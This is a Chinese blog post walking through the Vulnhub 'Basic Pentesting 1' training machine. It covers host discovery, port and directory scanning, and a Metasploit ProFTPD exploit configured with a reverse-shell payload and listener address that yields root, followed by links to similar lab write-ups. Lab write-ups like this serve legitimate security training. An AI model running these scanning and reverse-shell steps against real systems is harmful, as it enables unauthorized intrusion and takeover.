Basic-penetration靶机渗透测试

最新推荐文章于 2024-09-07 16:53:09 发布
最新推荐文章于 2024-09-07 16:53:09 发布
阅读量225 收藏 5
点赞数 2
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/140909972
版权

一、靶机下载地址

https://www.vulnhub.com/entry/basic-pentesting-1,216/#download

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 '00:0C:29:16:3A:EA'

2、指纹识别

# 使用命令
whatweb 192.168.145.187

3、端口扫描

# 使用命令
nmap 192.168.145.187 -p- -sV

4、目录扫描

# 使用命令
dirsearch -u "http://192.168.145.187"

三、获取shell和提权

1、访问靶机IP地址

2、 kali使用msfconsole查找漏洞

# 使用命令
msfconsole

search ProFTPD

3、 可以看到第五个是符合版本的(之前扫描端口的版本),使用并查看配置信息

4、设置配合信息并运行,成功获取到shell,并且已经是root权限

# 使用命令
set rhosts 192.168.145.187  #设置靶机IP地址

set payload cmd/unix/reverse # 设置payload

set lhost 192.168.145.146 # 设置监听的机器

run # 运行

果冻*果冻*
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机 Basic penetration渗透测试详解)
2301_78721909的博客
08-03 108
使用searchsploit工具搜索该版本的历史漏洞,发现存在命令执行漏洞。根据nmap的扫描结果发现ftp的版本为。2、对靶机IP进行主机发现和端口扫描。发现开放了21、22、80端口。成功获取root权限。
DC-4 靶机详解(两个解法版本)
TonyChaoWei的博客
04-11 959
DC-4 两钟解法
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1188
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulnhub-DC-3靶机实战
御七彩虹猫
03-31 1076
Vulnhub-DC-3靶机实战
DC-6靶机做题记录
Fab1an的博客
01-21 1294
hosts文件域名解析对WordPress的了解程度,比如后台是wp-admin,还有一个readme.htmlWordPress的扫描器叫wpscan,以及wpscan的用法,可以百度要会爆破它的用户名和密码,可以用BurpSuite或者wpscan去爆破,也可以用hydra或者其他的一些方式进入后台找寻一个能写php代码的地方,把shell弹回来找到一个插件的漏洞,然后用它来反弹shellnamp提权,用nse脚本提权。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 8610
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-15 2215
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-8靶机做题记录
Fab1an的博客
01-23 990
信息收集很重要,从robots.txt和扫目录的时候获得后台登录的目录对SQL注入的认识要能意识到是否存在SQL注入,还有对SQLmap的使用要熟练密码爆破工具john的用法反弹shell的一句话要熟练还有优化shell的命令最后提权,对漏洞库的用法和搜索要熟练。
vulnhub-dc3-渗透靶机-wp
yutianovo的博客
08-31 504
靶机描述 DESCRIPTION DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is o
DC-1靶机教程
qq_42553928的博客
04-07 5255
1.明确目标 DC:1 下载地址 https ://download.vulnhub.com/dc/DC-1.zip 2.信息收集 2.1被动信息收集 2.1.1DC:1网页信息收集 https://www.vulnhub.com/entry/dc-1,292/ Description Back to the Top DESCRIPTION DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
热门推荐
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 611
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
vulnhub靶机-DC7-Writeup
liuhanzhe的专栏
12-09 1568
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-7,356/ DESCRIPTION DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn’t an overly technical challenge, it isn’t exactly e
vulnhub靶机-DC8-Writeup
liuhanzhe的专栏
12-09 1993
0x01 介绍 靶机地址: https://www.vulnhub.com/entry/dc-8,367/ DESCRIPTION DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challe
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 905
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
如何启动网络安全计划:首先要做的事情
最新发布
网络研究观
09-07 911
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1725
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-04 1545
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
精通Metasploit:渗透测试实战指南
"《Metasploit - The Penetration Tester's Guide》是一本深入介绍渗透测试工具Metasploit的专业书籍,由David Kennedy、Jim O’Gorman、Devon Kearns和Mati Aharoni合著,并由HDMoore作序。这本书不仅详细阐述了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值